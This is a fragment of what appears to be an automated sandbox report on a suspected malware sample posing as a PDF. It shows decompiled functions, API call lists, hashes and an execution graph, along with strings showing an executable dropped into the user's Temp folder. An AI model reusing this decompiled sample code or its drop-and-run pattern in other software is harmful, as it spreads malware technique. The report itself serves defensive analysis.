                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2584051700-0
                                                                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                            0x00401c43
                                                                                            0x00401c45
                                                                                            0x00401c4c
                                                                                            0x00401c4f
                                                                                            0x00401c52
                                                                                            0x00401c5c
                                                                                            0x00401c60
                                                                                            0x00401c63
                                                                                            0x00401c6c
                                                                                            0x00401c6c
                                                                                            0x00401c6f
                                                                                            0x00401c73
                                                                                            0x00401c7c
                                                                                            0x00401c7c
                                                                                            0x00401c7f
                                                                                            0x00401c83
                                                                                            0x00401c85
                                                                                            0x00401cda
                                                                                            0x00401cdc
                                                                                            0x00401ce7
                                                                                            0x00401cf1
                                                                                            0x00401cf4
                                                                                            0x00401cf4
                                                                                            0x00401cfd
                                                                                            0x00000000
                                                                                            0x00401c87
                                                                                            0x00401c8e
                                                                                            0x00401c90
                                                                                            0x00401c93
                                                                                            0x00401c99
                                                                                            0x00401ca0
                                                                                            0x00401ca3
                                                                                            0x00401ccb
                                                                                            0x00401d03
                                                                                            0x00401d03
                                                                                            0x00401ca5
                                                                                            0x00401cb3
                                                                                            0x00401cbb
                                                                                            0x00401cbe
                                                                                            0x00401cbe
                                                                                            0x00401ca3
                                                                                            0x00401d06
                                                                                            0x00401d09
                                                                                            0x00401d0f
                                                                                            0x00402ba4
                                                                                            0x00402ba4
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                            0x00406544
                                                                                            0x00406546
                                                                                            0x0040655b
                                                                                            0x0040655e
                                                                                            0x00406563
                                                                                            0x00406568
                                                                                            0x004065a6
                                                                                            0x004065a6
                                                                                            0x0040656a
                                                                                            0x0040657c
                                                                                            0x00406587
                                                                                            0x0040658d
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406598
                                                                                            0x004065ac

                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,?,?,0040679D,80000002), ref: 0040657C
                                                                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,00422728), ref: 00406587
                                                                                            Strings
                                                                                            • "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi, xrefs: 0040653D
                                                                                            • ('B, xrefs: 0040655B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$('B
                                                                                            • API String ID: 3356406503-1341833266
                                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 58%
                                                                                            			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                            0x00405f38
                                                                                            0x00405f45
                                                                                            0x00405f46
                                                                                            0x00405f51
                                                                                            0x00405f59
                                                                                            0x00405f59
                                                                                            0x00405f61

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3936084776
                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 89%
                                                                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                            0x00405642
                                                                                            0x0040564c
                                                                                            0x00405668
                                                                                            0x0040568a
                                                                                            0x0040568d
                                                                                            0x00405693
                                                                                            0x0040569d
                                                                                            0x0040569e
                                                                                            0x004056a0
                                                                                            0x004056a6
                                                                                            0x004056a6
                                                                                            0x004056b0
                                                                                            0x00000000
                                                                                            0x004056be
                                                                                            0x00405675
                                                                                            0x004056ad
                                                                                            0x004056ad
                                                                                            0x00000000
                                                                                            0x004056ad
                                                                                            0x00405681
                                                                                            0x00405683
                                                                                            0x00000000
                                                                                            0x00405683
                                                                                            0x00405652
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405659
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • IsWindowVisible.USER32 ref: 0040566D
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                            0x00405f84
                                                                                            0x00405f8e
                                                                                            0x00405f91
                                                                                            0x00405f97
                                                                                            0x00405f98
                                                                                            0x00405f99
                                                                                            0x00405fa1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fa1
                                                                                            0x00405fa3
                                                                                            0x00405fab

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 00405F89
                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 00405F99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-3125694417
                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                            0x004060cd
                                                                                            0x004060cf
                                                                                            0x004060d2
                                                                                            0x004060fe
                                                                                            0x004060d7
                                                                                            0x004060e0
                                                                                            0x004060e5
                                                                                            0x004060f0
                                                                                            0x004060f3
                                                                                            0x0040610f
                                                                                            0x004060f5
                                                                                            0x004060fc
                                                                                            0x00000000
                                                                                            0x004060fc
                                                                                            0x00406108
                                                                                            0x0040610c
                                                                                            0x0040610c
                                                                                            0x00406106
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.3%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.3%
                                                                                            Total number of Nodes:1712
                                                                                            Total number of Limit Nodes:33
                                                                                            execution_graph 8890 40344b 8891 403457 ___scrt_is_nonwritable_in_current_image 8890->8891 8892 403472 8891->8892 8893 40345d 8891->8893 8903 405860 EnterCriticalSection 8892->8903 8894 40514f __dosmaperr 14 API calls 8893->8894 8896 403462 8894->8896 8898 40506e __wsopen_s 25 API calls 8896->8898 8897 40347e 8904 4034bc 8897->8904 8902 40346d 8898->8902 8903->8897 8912 4034e7 8904->8912 8906 4034c9 8907 40348b 8906->8907 8908 40514f __dosmaperr 14 API calls 8906->8908 8909 4034b2 8907->8909 8908->8907 8985 405874 LeaveCriticalSection 8909->8985 8911 4034ba 8911->8902 8913 4034f5 8912->8913 8914 40350c 8912->8914 8916 40514f __dosmaperr 14 API calls 8913->8916 8915 405dba __fread_nolock 25 API calls 8914->8915 8917 403516 8915->8917 8918 4034fa 8916->8918 8933 406ac6 8917->8933 8919 40506e __wsopen_s 25 API calls 8918->8919 8921 403505 8919->8921 8921->8906 8923 4035a4 8927 4035be 8923->8927 8928 4035d2 8923->8928 8924 4035f9 8925 403607 8924->8925 8924->8928 8926 40514f __dosmaperr 14 API calls 8925->8926 8929 40355b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 8926->8929 8936 40382a 8927->8936 8928->8929 8948 40366b 8928->8948 8929->8906 8955 40693e 8933->8955 8937 403839 __wsopen_s 8936->8937 8938 405dba __fread_nolock 25 API calls 8937->8938 8940 40384c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 8938->8940 8939 401c75 _ValidateLocalCookies 5 API calls 8941 4035ca 8939->8941 8942 406ac6 29 API calls 8940->8942 8947 403858 8940->8947 8941->8929 8943 4038a6 8942->8943 8944 4038d8 ReadFile 8943->8944 8943->8947 8945 4038ff 8944->8945 8944->8947 8946 406ac6 29 API calls 8945->8946 8946->8947 8947->8939 8949 405dba __fread_nolock 25 API calls 8948->8949 8950 40367e 8949->8950 8951 406ac6 29 API calls 8950->8951 8954 4036c7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 8950->8954 8952 40371e 8951->8952 8953 406ac6 29 API calls 8952->8953 8952->8954 8953->8954 8954->8929 8956 40694a ___scrt_is_nonwritable_in_current_image 8955->8956 8957 406952 8956->8957 8958 40696a 8956->8958 8960 40513c __dosmaperr 14 API calls 8957->8960 8959 406a1b 8958->8959 8963 40699f 8958->8963 8961 40513c __dosmaperr 14 API calls 8959->8961 8962 406957 8960->8962 8964 406a20 8961->8964 8965 40514f __dosmaperr 14 API calls 8962->8965 8980 408937 EnterCriticalSection 8963->8980 8967 40514f __dosmaperr 14 API calls 8964->8967 8968 403531 8965->8968 8970 406a28 8967->8970 8968->8923 8968->8924 8968->8929 8969 4069a5 8971 4069c9 8969->8971 8972 4069de 8969->8972 8973 40506e __wsopen_s 25 API calls 8970->8973 8974 40514f __dosmaperr 14 API calls 8971->8974 8975 406a4a __fread_nolock 27 API calls 8972->8975 8973->8968 8976 4069ce 8974->8976 8977 4069d9 8975->8977 8978 40513c __dosmaperr 14 API calls 8976->8978 8981 406a13 8977->8981 8978->8977 8980->8969 8984 4089ec LeaveCriticalSection 8981->8984 8983 406a19 8983->8968 8984->8983 8985->8911 9104 40474c 9107 4046d3 9104->9107 9108 4046df ___scrt_is_nonwritable_in_current_image 9107->9108 9115 408759 EnterCriticalSection 9108->9115 9110 404717 9116 404735 9110->9116 9111 4046e9 9111->9110 9113 40935b __fassign 14 API calls 